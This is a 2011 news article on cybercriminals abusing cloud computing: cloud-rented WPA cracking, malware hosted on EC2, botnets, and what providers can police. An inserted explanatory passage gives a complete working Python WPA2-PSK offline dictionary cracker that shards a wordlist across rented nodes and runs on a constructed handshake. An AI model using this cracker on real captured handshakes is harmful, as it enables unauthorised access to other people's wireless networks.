Cloud a haven for cybercriminals
February 7, 2011

A security researcher last month warned that cloud services can be exploited for criminal purposes. At the Black Hat security conference, Thomas Roth said he was planning to release an open source kit that would enable users to crack Wi-Fi passwords by leveraging the computing power of the Amazon Web Services (AWS) cloud running on GPU-based servers.
There are other similar tools that use leasable cloud services to crack Wi-Fi authentication mechanisms such as Wi-Fi Protected Access (WPA), using the cloud infrastructure's processor cluster to run dictionary attacks. Such attacks run offline against a captured WPA handshake, so the only limit is how quickly candidate passphrases can be tested, which is exactly what rented compute supplies.
According to security vendors, such tools are readily available.
In an e-mail interview, Ronnie Ng, manager of systems engineering at Symantec Singapore, pointed to a 2009 blog post which noted that a Web site was purportedly selling automated WPA password crackers that used cloud computing technology.
The site allowed anyone to "pay a token sum of US$34 to rent time on a large 400-node computer cluster and check over 135,000,000 potential passwords against a targeted victim in just 20 minutes". The Symantec blogger noted that an attacker with no technical knowledge could obtain the password and use it for illegal purposes, such as spying on the victim's network.
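The mechanism behind the services described above, as an added example that is not part of the article and is not Roth's kit or the Web site's cracker: WPA/WPA2-PSK derives the pairwise master key with PBKDF2-HMAC-SHA1 over the passphrase and SSID (4096 rounds), and the MIC on a captured EAPOL-Key frame acts as the oracle that tells the attacker whether a candidate passphrase is right. Every candidate is independent, which is why a wordlist shards cleanly across rented nodes. The handshake below is constructed in code (the SSID, MAC addresses, nonces and passphrase are all assumptions), and the PMK derivation is checked against the IEEE 802.11i test vector for "password"/"IEEE".

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, List, Optional

# WPA/WPA2-PSK key derivation parameters fixed by IEEE 802.11i.
PBKDF2_ROUNDS = 4096
MIC_OFFSET = 81          # MIC field in an EAPOL-Key frame: bytes [81:97]
MIC_LEN = 16


@dataclass(frozen=True)
class Handshake:
    """What a passive listener captures: SSID, both MACs, both nonces and one MIC'd EAPOL-Key frame."""
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol: bytes   # full EAPOL-Key frame (802.1X header included) carrying its MIC


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the expensive step, and the one a GPU or rented cluster parallelises per candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), PBKDF2_ROUNDS, 32)


def derive_kck(pmk: bytes, hs: Handshake) -> bytes:
    """First 16 bytes of the PTK (the Key Confirmation Key), via the 802.11i PRF-512."""
    data = (min(hs.ap_mac, hs.sta_mac) + max(hs.ap_mac, hs.sta_mac)
            + min(hs.anonce, hs.snonce) + max(hs.anonce, hs.snonce))
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return ptk[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1-128 over the frame with the MIC field zeroed."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: the captured MIC is the oracle; no traffic to the victim is needed."""
    captured = hs.eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:
            continue  # not a legal WPA passphrase; skip rather than spend 4096 rounds on it
        kck = derive_kck(derive_pmk(candidate, hs.ssid), hs)
        if hmac.compare_digest(eapol_mic(kck, hs.eapol), captured):
            return candidate
    return None


def shard(wordlist: List[str], node_count: int, node_index: int) -> List[str]:
    """Candidates are independent, so a wordlist splits trivially across N rented nodes."""
    return wordlist[node_index::node_count]


# --- Constructed sample handshake (not a real capture) ---------------------------
def build_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 of 4 (WPA2, MIC zeroed): 802.1X header + key descriptor."""
    body = (bytes([0x02])                                   # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")                   # key info: version 2, pairwise, MIC set
            + (0).to_bytes(2, "big")                        # key length
            + (1).to_bytes(8, "big")                        # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + b"\x00" * MIC_LEN + (0).to_bytes(2, "big"))        # MIC, key data length
    return bytes([0x01, 0x03]) + len(body).to_bytes(2, "big") + body


def make_sample_handshake(passphrase: str) -> Handshake:
    ssid = "CoffeeShopWiFi"                                   # assumed SSID
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # assumed MACs
    anonce, snonce = bytes(range(32)), bytes(range(100, 132))  # fixed nonces for reproducibility
    unsigned = build_msg2(snonce)
    partial = Handshake(ssid, ap_mac, sta_mac, anonce, snonce, unsigned)
    mic = eapol_mic(derive_kck(derive_pmk(passphrase, ssid), partial), unsigned)
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce,
                     unsigned[:MIC_OFFSET] + mic + unsigned[MIC_OFFSET + MIC_LEN:])


SAMPLE_HANDSHAKE = make_sample_handshake("summer2010")   # assumed victim passphrase
WORDLIST = ["password", "12345678", "letmein", "summer2009", "summer2010", "qwertyuiop"]

if __name__ == "__main__":
    for node in range(4):  # simulate four cluster nodes, each taking a slice of the wordlist
        print(f"node {node}: {crack(SAMPLE_HANDSHAKE, shard(WORDLIST, 4, node))!r}")
```

The 4096 PBKDF2 rounds are the whole cost; once a node has a PMK, the PRF and MIC check are a handful of HMAC calls. That is why the cracking rate scales linearly with rented cores or GPUs, and why a long random passphrase, rather than anything a cloud provider does, is the defence that actually matters.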
Magnus Kalkuhl, director of Kaspersky Lab's global research and analysis team in Europe, also noted that cloud infrastructure has been misused for hosting malware. He told ZDNet Asia in an e-mail that there have been instances in the past where Amazon Elastic Compute Cloud (Amazon EC2) was used as a malware hosting platform, including a recent instance in which a trojan was spread using Rapidshare.
Kalkuhl noted that, in fact, certain malware has "for years" already been running on its own cloud. "Actually all DDoS (distributed denial-of-service) attacks and spamming services offered by cybercriminals are based on a cloud architecture, [which is] their own botnets made of thousands or even millions of infected PCs."
In an e-mail interview, Paul Ducklin, head of technology for Sophos Asia-Pacific, added: "Almost anything you can do in the way of cybercrime on a standalone PC can be achieved through the cloud."
In fact, he noted that cloud-based services such as social networks can make cybercrime easier.
Spam and scams can spread on Facebook, for instance, without ever raising an alarm on the user's PC, Ducklin explained; the automatic many-to-many distribution of content that social networks offer works to cybercriminals' advantage as well.
Responsibility on service providers
With more users moving onto the cloud platform, Ng cautioned that criminal activities on the cloud will rise.
"The cloud’s growing popularity will increase the risk of [users] being targeted by cybercriminals," he said. He noted that the onus is on cloud service providers to "demonstrate due diligence" in ensuring organizations that lease their services do not engage in malicious activities.
Ducklin concurred: "Why would [businesses] be willing to store [their] data with a cloud provider that also allows cybercrooks and dodgy operators to use its services?"
Citing the case of DDoS attacks related to Wikileaks, he stressed that other users can be affected if a service provider is indiscriminate about whom it provides its services to.
"If your cloud provider services a wide range of businesses, the chance that one of them might become the victim of vigilantes carrying out a DDoS attack is higher," Ducklin said. "You might lose quality of service due to sociopolitical problems suffered by someone else ‘in your cloud’."
But while the security players agreed that cloud service providers should be vigilant when providing services, they noted that ensuring total control is not easily achieved.
Kalkuhl said concerns over privacy limit service providers’ ability to have complete control.
"Major cloud service providers like Amazon may check outgoing traffic for suspicious patterns such as DDoS attacks against other machines, [as well as instruct] customers who use virtual machines to conduct system penetration tests to inform the service provider in advance.
"However, it is not possible for the providers to scan the content of [network] traffic for keywords or malware signatures, for instance," he explained. "Neither are they allowed to scan or manually check what files are stored in a provided [cloud] environment. Otherwise, people would lose their trust in cloud providers and the whole business model would be put at risk."